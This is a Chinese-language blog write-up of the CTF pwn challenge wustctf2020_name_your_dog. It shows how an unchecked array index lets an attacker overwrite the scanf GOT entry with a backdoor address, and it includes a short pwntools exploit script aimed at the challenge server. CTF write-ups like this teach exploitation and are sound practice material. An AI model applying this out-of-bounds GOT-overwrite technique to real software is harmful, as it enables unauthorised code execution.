wustctf2020_name_your_dog(数组越界劫持got)

最新推荐文章于 2022-04-06 16:41:34 发布
最新推荐文章于 2022-04-06 16:41:34 发布
阅读量249 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121167688
版权

wustctf2020_name_your_dog:

有一道类似的叫name_your_cat,是数组越界
请添加图片描述

逆向分析:

主界面

请添加图片描述
请添加图片描述

NameWhich函数:
根本没检查边界,num我们随便取,依旧数组越界
请添加图片描述
后门
请添加图片描述

具体步骤:

got表可写,got表就在dog上面不远处,我们能改__isoc99_scanf,printf
printf=0x0804A00C
__isoc99_scanf=0x0804A028
dog=0x804a060
由于与print相差不是8的倍数,我们选scanf
num填(0x28-0x60)/8=-7

exp:

from pwn import*
#r=process('./wustctf2020_name_your_dog')
r=remote('node4.buuoj.cn',26698)
shell=0x80485cb
r.sendlineafter('Name for which?\n>','-7')
r.sendlineafter('Give your name plz: ',p32(shell))
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
深入理解用mysql_fetch_row()以数组的形式返回查询结果
10-27
例如,如果查询结果的第一列是 "book_name",第二列是 "price",那么在数组 `$row` 中,`$row[0]` 将包含 "book_name" 的值,`$row[1]` 将包含 "price" 的值。 在提供的示例代码中,可以看到如何使用 `mysql_fetch_...
PHP合并数组+号和array_merge的区别
10-24
对于关联数组(即具有字符串键的数组),如果两个数组共享相同的键,那么使用加号合并时,只有第一个数组的键值会被保留,而第二个数组的对应键值将被忽略。在提供的示例中: ```php $arr1 = array( 10 => 'value...
WUST-CTF2020-WP
夏日 の blog
03-29 5290
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
tomcat对url请求中的特殊字符处理 分析
qq_41891666的博客
11-30 3453
0x00 前言 事情起因是 最近在看 orange 大佬在black hat 发的一篇关于路径穿越的议题 PDF:https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf 里面谈到了反向代理和tomcat 二义性问题导致路径穿越: 然后本地搭建tomcat ,直接在浏览器中用 …;/来进
wustctf2020_name_your_dog
m0_57754423的博客
04-06 3092
这里存在数组越界,没有进行检查,所以我们可以任意地址写,这里写got为shell即可 from pwn import * p = remote("node4.buuoj.cn",27085) shell = 0x080485CB p.sendlineafter(">",'-7') p.sendlineafter("Give your name plz: ",p32(shell)) p.interactive() ...
Wust CTF 2020 黄金体验镇魂曲 writeup
qq_42436176的博客
03-30 1637
前言 这是我第一次打CTF, 比赛之前可以说是几乎啥都不懂, 靠着点平常开发的老底, 感谢dalao出的题都很萌新, 这才取得不错的成绩 Misc 比赛规则 比赛采用CTF标准赛制,选手需要在题目环境中找到类似 wctf2020{y0u_kn0w_th3_rule5} 的字符串并将其在题目相应的地方提交得分 这题flag就是wctf2020{y0u_kn0w_th3_rule5} Space C...
[BUUCTF-pwn]——wustctf2020_name_your_dog
Y_peak的博客
03-10 314
[BUUCTF-pwn]——wustctf2020_name_your_dog 题目地址:https://buuoj.cn/challenges#wustctf2020_name_your_dog checksec看下, 在IDA中看下, 竟然有后门函数,我们只需要执行该函数就好 看完代码发现, 没有什么可以溢出的地方. 唯一可以找到修改一些东西的只有, 这个函数, %7s虽然限定了长度但是足够写进去一个地址了. 看一下它的上一级, 调用发现Dogs在bss段距离got表很近, 意味着我们可以修改
利用按钮数组控件简化编程.rar_VB 控件数组_利用按钮数组控件简化编程
09-24
在VB(Visual Basic)编程中,控件数组是一种非常实用的技术,它可以帮助开发者更高效地管理多个具有相同类型的控件,比如按钮。本教程“利用按钮数组控件简化编程”将深入探讨如何通过创建和使用按钮数组来简化代码...
sql.rar_SQL 数组
09-21
标题中的"sql.rar_SQL 数组"提示我们,这个压缩包可能包含了一个与使用数组处理SQL查询相关的VB.NET代码示例。描述中提到的“.net 使用参数读取数据库函数”以及“1.声明一个数组。2.sql参数使用@p1格式”,暗示了...
php函数array_merge用法一例(合并同类数组)
01-21
复制代码 代码如下:$arr1 = $dblink->mem_fetch_array ( “SELECT t_pid,imgname,invented,score FROM `t_sum_giftimg` where t_pid=3 or t_pid=6”, 0 ); $arr2 = $dblink->mem_fetch_array ( “SELECT t_pid,...
PWN入门之数组越界-附件资源
03-05
PWN入门之数组越界-附件资源
[BUUCTF]PWN——wustctf2020_name_your_cat(数组越界
mcmuyanga的博客
03-13 1255
wustctf2020_name_your_cat 附件 步骤 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,在检索字符串的时候发现了后门 主要函数
wustctf2020_name_your_cat
z1r0的博客
01-17 641
wustctf2020_name_your_cat 查看保护 可以看到v3是一个数组,而v0是namewhich返回值,假如参数v0可控那么v3就可以被溢出。 v2是namewhich的返回值,这里v2可控,vuln函数中v3可以进行溢出 距离ebp 0x34。0x34 + 4 = 8 * 7 = 56,v2为7时刚好可以覆盖到ret。这时再输入name为shell这个后门函数即可。 from pwn import * context(arch='i386', os='linux', log_lev
WUST-CTF2020 writeup
abtgu的博客
04-02 1359
文章目录WEBcheckinadminMISCSpace ClubWelcome爬Find meShopgirlfriendAlison likes jojo WEB checkin 题目: 无 解题思路: 打开链接,发现提问作者,打开查看器,发现按钮被隐藏,输入框被限制,更改代码,输入作者名,提示一个博客 打开,在最上方发现flag的一部分 仔细查看,有一篇名为《远古的blog》的博客,打...
[WUSTCTF2020]朴实无华
qq_43801002的博客
04-29 1961
题目: 题目一打开显示乱码,我们用火狐浏览器调整一下编码就OK,但是不知道为什么qq浏览器调整之后还是不行 火狐浏览器->三道杠->更多->文字编码->Unicode就可以了 痛苦才刚刚开始 1.看到bot字眼,第一眼想到buu的bot机器人,然后就想到robots.txt网站的爬虫规则,访问一下,果然有料 2.访问一下fAke_f1agggg.php,我就知道不会...
武科WUST-CTF2020“Tiki组 ”
pone2233的博客
03-29 1222
文章目录赛事信息题目状态:Web:admin | SOLVED |checkin | SOLVED |CV Maker | SOLVED |Reverse:无Pwn:无Misc:Find me | SOLVED |爬 | SOLVED |签到 | SOLVED |Alison likes jojo | SOLVED |Space Club | SOLVED |三人行 | SOLVED |girlf...
[WUSTCTF2020]朴实无华_WP
Accompany的博客
02-12 3439
题目一览 文章目录题目一览分析获取flag标题Level 1Level 2get flag 分析 打开题目,除了hack me,没有得到可利用信息,查看源码 虽然编码有一点问题,但还是发现了这个利用点bot,想到robots.txt网站的爬虫规则 robots.txt置于网站的根目录下。爬虫根据此文件决定网站下的哪些页面是被授权抓取的 robots.txt 意为对任何爬虫,禁止其访问/fAke_f1agggg.php目录下的文件 但对于这个提示,我们明显是要访问看看有无可利用信息 /fAke_f
将image_name转化为字符串数组并返回
最新发布
06-08
好的,你要求我将 `image_name` 转化为字符串数组并返回,那么你可以使用以下代码实现: ```python image_name = "example.png" # 将字符串转化为字符数组 image_name_array = [char for char in image_name] # ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值